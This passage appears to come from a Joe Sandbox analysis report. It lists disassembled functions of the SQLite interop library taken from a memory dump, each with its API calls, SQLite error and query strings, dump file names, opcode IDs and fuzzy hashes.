SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0003544F,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC647E5

Strings

%s at line %d of [%.10s], xrefs: 6BC647DE
database corruption, xrefs: 6BC647D9
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC647CF

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d._memmove_memset
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 1567147133-2469029621
Opcode ID: f1b4202d26362df43b6bad7bd1b0a36cca5435785781d55ebb2ac0c59b0e0e72
Instruction ID: 78946abdf37db77f0c012b1cbeda0603da1592425468d2b04cab03358955d741
Opcode Fuzzy Hash: f1b4202d26362df43b6bad7bd1b0a36cca5435785781d55ebb2ac0c59b0e0e72
Instruction Fuzzy Hash: E6D19F71A252018FDB18CF28C4E1F5A37A5FF41389F1440A9DD158F24AF739DA92CB91

Function 6BC60310 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 298COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011E43,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,?,?,?,?,6BC6B7A4,00000000,?,00000000,00000000), ref: 6BC60355
SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011E52,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,?,?,?,?,6BC6B7A4,00000000,?,00000000,00000000), ref: 6BC603A1

Strings

%s at line %d of [%.10s], xrefs: 6BC6034E, 6BC6039A
database corruption, xrefs: 6BC60349, 6BC60395
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6033F, 6BC6038B

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 9c072eaa5168dcd57ddb73df08ebca3de70b7b7ace5060f5dcc7fa68d858b21e
Instruction ID: 8da7294ef00cab0ddad5a4e1d64bc9096b0f8c39f1af11e84b9a312369373d9c
Opcode Fuzzy Hash: 9c072eaa5168dcd57ddb73df08ebca3de70b7b7ace5060f5dcc7fa68d858b21e
Instruction Fuzzy Hash: 65B17D71A183019FC704CF29D4C0A6AB7E5FBC8754F04866DE959AB341F738EA54CBA2

Function 6BC229E0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 295COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC22A44

Part of subcall function 6BCC5630: _memset.LIBCMT ref: 6BCC5737

Strings

L* N* Co, xrefs: 6BC22A3F
categories, xrefs: 6BC22A9F, 6BC22BFD
tokenchars, xrefs: 6BC22B7D
remove_diacritics, xrefs: 6BC22B12
separators, xrefs: 6BC22BB2

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: L* N* Co$categories$remove_diacritics$separators$tokenchars
API String ID: 2102423945-414796364
Opcode ID: c148081b8f043bf1927d8ff4012dc23fcd07d51d8a8120582c2e5931548df0fe
Instruction ID: 6998d350b28d50537b56f70528a9e52734d59ec79b254564a883c4fe1cf928cd
Opcode Fuzzy Hash: c148081b8f043bf1927d8ff4012dc23fcd07d51d8a8120582c2e5931548df0fe
Instruction Fuzzy Hash: C8B13670A392528BFB158F28842572ABBA0BF42709F4405ADE8D59F241FB3CD746C792

Function 6BC4A1F0 Relevance: 10.8, APIs: 7, Instructions: 292COMMON

Download Yara Rule

APIs

SI216a233b40cb7147.SQLITE.INTEROP(?,00000000), ref: 6BC4A2EF
SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BC4A302
SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BC4A32C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I8b0d9e6837e61abc.$I216a233b40cb7147.
String ID:
API String ID: 305067579-0
Opcode ID: 0be29c240fb4f2570628a50f398d276dd53348b12cc71669e80ea7a03bbf4137
Instruction ID: 2e27e35fe4117b9b8fc6e2e9beace78c1a82cab8e0947f45f9a132d7343127c3
Opcode Fuzzy Hash: 0be29c240fb4f2570628a50f398d276dd53348b12cc71669e80ea7a03bbf4137
Instruction Fuzzy Hash: 89A1A0B1A193018FD310CF68C481A5ABBF5EBC5328F14497DF89987311E73AEB458B92

Function 6BC24B90 Relevance: 10.8, APIs: 7, Instructions: 253COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24C51
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24CA2
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24D99
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24DC3
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24DD0
_memset.LIBCMT ref: 6BC24DF2
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC24E37

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$_memset
String ID:
API String ID: 1480580083-0
Opcode ID: 663e6b86d17ab2a7b6f2ee2359fe2e760fa0c2d1de033a7919c84e4e218b2c80
Instruction ID: 2927c3e845ce2efd82f01a2994f753ee997e151b04656b5fe1570da4a7ce4e31
Opcode Fuzzy Hash: 663e6b86d17ab2a7b6f2ee2359fe2e760fa0c2d1de033a7919c84e4e218b2c80
Instruction Fuzzy Hash: 25A14AB1A197019FD710CF68D880A5BB7F4BF88718F104A5DF9998B311E739EA05CB92

Function 6BCC2DC0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B224,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?), ref: 6BCC3038

Strings

BINARY, xrefs: 6BCC2F0E, 6BCC2F37
%s at line %d of [%.10s], xrefs: 6BCC3031
no such table column: %s.%s, xrefs: 6BCC2FAE
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCC3022
misuse, xrefs: 6BCC302C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$BINARY$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$no such table column: %s.%s
API String ID: 2981141233-502253091
Opcode ID: 5dbca51f7359c77e1f7e23d6a9d60f62f5a68570b8844a6400cec6d4519be8e3
Instruction ID: a8204a2c7674e778fa7ac207d9da5fa86df180628d527b16ce3f197b4049df48
Opcode Fuzzy Hash: 5dbca51f7359c77e1f7e23d6a9d60f62f5a68570b8844a6400cec6d4519be8e3
Instruction Fuzzy Hash: 118181B0E112199BDB00CFA5C891BAFB7B4BF54704F1050A9E814EB341E778DB41CB92

Function 6BC4AF40 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

APIs

SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BC4AF95
SI8b0d9e6837e61abc.SQLITE.INTEROP(?,00000000), ref: 6BC4AFA2
SIffb8076c269e2a85.SQLITE.INTEROP(00000000), ref: 6BC4AFC2
SIffb8076c269e2a85.SQLITE.INTEROP(?,00000000), ref: 6BC4AFCD
SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BC4B037
SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BC4B06B
SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC4B155

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I8b0d9e6837e61abc.$Iffb8076c269e2a85.$I1bf8975e567ea97a.
String ID:
API String ID: 1260191962-0
Opcode ID: 1db8a78617f4db27c8dce47972731afd61e48b2bb7d85db8a0854d6974992630
Instruction ID: 551b63206435859d8ec25e77a6b7a4a2d9043a7e629318feed8fa5e3cd5f0ae9
Opcode Fuzzy Hash: 1db8a78617f4db27c8dce47972731afd61e48b2bb7d85db8a0854d6974992630
Instruction Fuzzy Hash: 2D71ADB1A297018BD710CF34C89061FBBF1AF8A604F1449ADE8A99B301F739DB45C792

Function 6BC48A90 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 198COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC48AE4
SIffb8076c269e2a85.SQLITE.INTEROP(?), ref: 6BC48B62
SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BC48B7C
SIdace78b5300c999f.SQLITE.INTEROP(?,00000007,00000000,000000FF), ref: 6BC48CEF

Strings

%g, xrefs: 6BC48C5E
{%lld, xrefs: 6BC48C39

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I8b0d9e6837e61abc.Idace78b5300c999f.Iffb8076c269e2a85._memset
String ID: %g${%lld
API String ID: 3673669252-3707171336
Opcode ID: bfa5e1eddce459564079b202f3094dd634a77b6c5a44a947b5818d33cd22db07
Instruction ID: 02112e6ce0d9192c4cb5aeec6d6799b0810613612d61206f6672c2cc29b3ea3a
Opcode Fuzzy Hash: bfa5e1eddce459564079b202f3094dd634a77b6c5a44a947b5818d33cd22db07
Instruction Fuzzy Hash: 7961D2B05193918FD310DF388881A5BBBE1AF96308F04496DE9D987381F739E709CB96

Function 6BCA0160 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 197COMMON

Download Yara Rule

Strings

SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 6BCA020B
sqlite_stat4, xrefs: 6BCA02CE
SELECT idx,count(*) FROM %Q.sqlite_stat4 GROUP BY idx, xrefs: 6BCA02E9
sqlite_stat1, xrefs: 6BCA01E4

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: SELECT idx,count(*) FROM %Q.sqlite_stat4 GROUP BY idx$SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1$sqlite_stat4
API String ID: 0-291810292
Opcode ID: 0cb14ff2b498979309643468d60dd2a6a247673499bd2fa6ecd7f415691fd311
Instruction ID: 97def3ba3ae090dd4c1fb452746d3411db8e666eabd7b4557304159576fbb053
Opcode Fuzzy Hash: 0cb14ff2b498979309643468d60dd2a6a247673499bd2fa6ecd7f415691fd311
Instruction Fuzzy Hash: 8671B570E217169BEB01DFA4C881BAEB7B4BF09355F400299DD18AB201F738EA45CBD1

Function 6BCE1DF0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BCE1E56

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE1EC1
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE1F38

Strings

%s at line %d of [%.10s], xrefs: 6BCE1EBA, 6BCE1F31
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCE1EAB, 6BCE1F22
misuse, xrefs: 6BCE1EB5, 6BCE1F2C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.$_memset
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 3073774149-160653349
Opcode ID: 343f6a6c0fe0a1c7142f992dd373a11a17f02167e2d9982108bd94eea8a93c49
Instruction ID: 5249b7d88db9cab55a36624b2c657e6263d5408b595938c173e4c8c3e8181735
Opcode Fuzzy Hash: 343f6a6c0fe0a1c7142f992dd373a11a17f02167e2d9982108bd94eea8a93c49
Instruction Fuzzy Hash: 334122B16207159BD7108F799C06B87B7A8FF40728F000568FA19DB241FB3DE6268BE1

Function 6BCA21E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 108COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BCA2207
_memset.LIBCMT ref: 6BCA221B
_memset.LIBCMT ref: 6BCA222C

Strings

7, xrefs: 6BCA2285
,, xrefs: 6BCA226C
9, xrefs: 6BCA2275

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: ,$7$9
API String ID: 2102423945-1653249994
Opcode ID: 8a995c2b27bb8b037c44c8e8aec729e33f202ecd00c557c451a97611ca4748bc
Instruction ID: 24dbfc1bb1d1d41fca288b34f202b535c8caefa32792722bb180d3fa4bf5ec21
Opcode Fuzzy Hash: 8a995c2b27bb8b037c44c8e8aec729e33f202ecd00c557c451a97611ca4748bc
Instruction Fuzzy Hash: 9D31E3B15093919FE314CF29D851B6BB7E8AF85714F04491DFA944B281E778EB08CB92

Function 6BCC2430 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 6BCC1A50: SI8c5d6a3d79dd16ae.SQLITE.INTEROP(?,?,00000001,?,?,?), ref: 6BCC1ACD
Part of subcall function 6BCC1A50: SIa364946505687432.SQLITE.INTEROP(?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000000,6BCDE566), ref: 6BCC1AE1
Part of subcall function 6BCC1A50: SI06ad3f4f233fab5b.SQLITE.INTEROP(00000000,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000000,6BCDE566), ref: 6BCC1AFE

SIc14fb8a21feb2e94.SQLITE.INTEROP(00000000,SAVEPOINT replace_op,00000000,00000000,00000000), ref: 6BCC249E
SI8c5d6a3d79dd16ae.SQLITE.INTEROP(?,?,00000001,00000000,00000000,?,?,?), ref: 6BCC24D3
SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCC24E3
SIc14fb8a21feb2e94.SQLITE.INTEROP(00000000,RELEASE replace_op,00000000,00000000,00000000), ref: 6BCC251F

Strings

SAVEPOINT replace_op, xrefs: 6BCC2498
RELEASE replace_op, xrefs: 6BCC2519

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I8c5d6a3d79dd16ae.Ia364946505687432.Ic14fb8a21feb2e94.$I06ad3f4f233fab5b.
String ID: RELEASE replace_op$SAVEPOINT replace_op
API String ID: 3125106539-3590263232
Opcode ID: 8605b896c14e9e0ded0b42473336ca1455761ef9495b219984d99c6cc58b34a2
Instruction ID: 6011e57fd98e59ba7d823318e2c86cff19cea2e8ad18a6fd522903c0bd0da1c9
Opcode Fuzzy Hash: 8605b896c14e9e0ded0b42473336ca1455761ef9495b219984d99c6cc58b34a2
Instruction Fuzzy Hash: 55316FB6A142007BE320DE659C52F7777ACDB94258F009559FD5A87241F738EA1086A2

Function 6BC2F4B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77COMMON

Download Yara Rule

APIs

SIdb45e174afb28e2c.SQLITE.INTEROP(%s.%s,?,?), ref: 6BC2F50D
SIdb45e174afb28e2c.SQLITE.INTEROP(%s.%z,?,00000000), ref: 6BC2F528

Strings

authorizer malfunction, xrefs: 6BC2F558
%s.%z, xrefs: 6BC2F523
%s.%s, xrefs: 6BC2F508
access to %z is prohibited, xrefs: 6BC2F531

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Idb45e174afb28e2c.
String ID: %s.%s$%s.%z$access to %z is prohibited$authorizer malfunction
API String ID: 778684903-3806136567
Opcode ID: e95eb56a3701b5748717a98b89efe486bdd9ca226eb475346adee49f2f31888e
Instruction ID: 4f99690ef6701ac5a056b58591135f8f3c34efbbb31ac7de92ec2c11d287729b
Opcode Fuzzy Hash: e95eb56a3701b5748717a98b89efe486bdd9ca226eb475346adee49f2f31888e
Instruction Fuzzy Hash: D7218471914609AFD710DF68DC81EABB3A8EB85228F004569FC1887241E779AA548BE1

Function 6BBD2470 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 6BBD2495
__calloc_crt.LIBCMT ref: 6BBD24A1
__getptd.LIBCMT ref: 6BBD24AE
CreateThread.KERNEL32(?,?,6BBD240B,00000000,?,?), ref: 6BBD24E5
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 6BBD24EF
_free.LIBCMT ref: 6BBD24F8
__dosmaperr.LIBCMT ref: 6BBD2503

Part of subcall function 6BBD2362: __getptd_noexit.LIBCMT ref: 6BBD2362

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 155776804-0
Opcode ID: 2af64906f234e0f3e4fa68355facf57666f798778fc8a1e41b570397ff4cc456
Instruction ID: f9b4303428fa5a0b1187addb7dc2c7adbc8fd72fbbe0393dbe9ea537d01389ed
Opcode Fuzzy Hash: 2af64906f234e0f3e4fa68355facf57666f798778fc8a1e41b570397ff4cc456
Instruction Fuzzy Hash: CD11C4322047CAAFEB159FB4DC42D8F7BE8EF45778B104029F91586181DB7DD9118BA4

Function 6BC3D720 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 51COMMON

Download Yara Rule

APIs

SIdb45e174afb28e2c.SQLITE.INTEROP(non-deterministic use of %s() in %s,?,a generated column), ref: 6BC3D76B
